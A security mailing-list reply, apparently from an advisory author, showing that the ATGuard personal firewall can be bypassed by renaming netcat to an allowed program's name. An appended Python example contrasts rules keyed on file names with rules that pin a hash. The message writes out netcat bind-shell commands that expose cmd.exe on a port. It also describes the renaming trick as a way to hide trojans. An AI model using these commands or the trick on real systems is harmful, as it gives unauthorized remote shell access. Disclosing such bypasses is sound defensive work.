As far as I see, the article you gave me at tooleaky.zensoft.com mostly deals with outbound connections. The ATGuard problem goes further still: it is also a problem with inbound connections.

I use a Xitami Webserver on Port 50080 for testing purposes. This Xitami Webserver is (currently) allowed to accept all connections on all ports (this is also a configuration problem, but most people just allow inbound connections from any address to any port for an application). So, I just did the following:

    I:\>cd netcat
    I:\netcat>nc -e c:\winnt\system32\cmd.exe -p 500 -l

I tried to connect to port 500 with telnet: ATGuard fires up as it is supposed to. So, now I did the following:

    I:\netcat>copy nc.exe xiwin32.exe
            1 Datei(en) kopiert.

(Translation for the curious non-German readers: 1 File copied :)

    I:\netcat>xiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l

Trying it with telnet again, I got a very nice shell without any notice from ATGuard. That's why I also mentioned trojan horses in my Advisories - just renaming your trojan horse to the name of a program that is allowed to accept inbound connections will do the trick.

> There is no ultimate way to control all outbound communication. If you use
> your own low-level drivers, no personal firewall can stop you.

Surely there is no ultimate way. But if you are not aware that a problem exists, you can't think about solutions. Also, you perhaps will think that your personal firewall is perfectly safe while it isn't.

Best regards,

-------------------------------------------------------
BlueScreen / Florian Hobelsberger (UIN: 101782087)
Member of:
www.IT-Checkpoint.net
www.Hackeinsteiger.de
www.DvLdW.de
==================================================================
To encrypt classified messages, please download and use this PGP-Key:
http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt
==================================================================
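
Added example, not part of the original message and not ATGuard's code: a per-application rule that matches on the executable's file name, beside one that also pins the SHA-256 of the approved binary, evaluated against a copy of a different file under the allowed name. The function names, the rule layout and the file contents are constructed for illustration; the hash pinning is an assumed mitigation, not a description of any product.

```python
import hashlib
import os
import shutil
import tempfile


def sha256_of(path):
    """Hash the executable's contents in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def allow_by_name(rules, exe_path):
    """Weak check: the rule matches on the file name alone."""
    return os.path.basename(exe_path).lower() in rules


def allow_by_hash(rules, exe_path):
    """Stronger check: name must match AND contents must equal the pinned hash."""
    pinned = rules.get(os.path.basename(exe_path).lower())
    return pinned is not None and pinned == sha256_of(exe_path)


def run_demo():
    """Build constructed stand-in files and evaluate both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        server = os.path.join(tmp, "xiwin32.exe")
        other = os.path.join(tmp, "nc.exe")
        with open(server, "wb") as f:
            f.write(b"constructed stand-in for the allowed web server")
        with open(other, "wb") as f:
            f.write(b"constructed stand-in for a different program")
        # Rule recorded at the moment the user approved the web server.
        rules = {"xiwin32.exe": sha256_of(server)}
        # Same step as in the message: a different file copied under the allowed name.
        renamed_dir = os.path.join(tmp, "netcat")
        os.mkdir(renamed_dir)
        renamed = os.path.join(renamed_dir, "xiwin32.exe")
        shutil.copy(other, renamed)
        return {
            "name_genuine": allow_by_name(rules, server),
            "name_renamed": allow_by_name(rules, renamed),
            "hash_genuine": allow_by_hash(rules, server),
            "hash_renamed": allow_by_hash(rules, renamed),
        }


if __name__ == "__main__":
    for check, allowed in run_demo().items():
        print(check, "allow" if allowed else "block")
```

A pinned hash has to be re-approved whenever the legitimate program is updated, which is the operational cost of closing the rename gap.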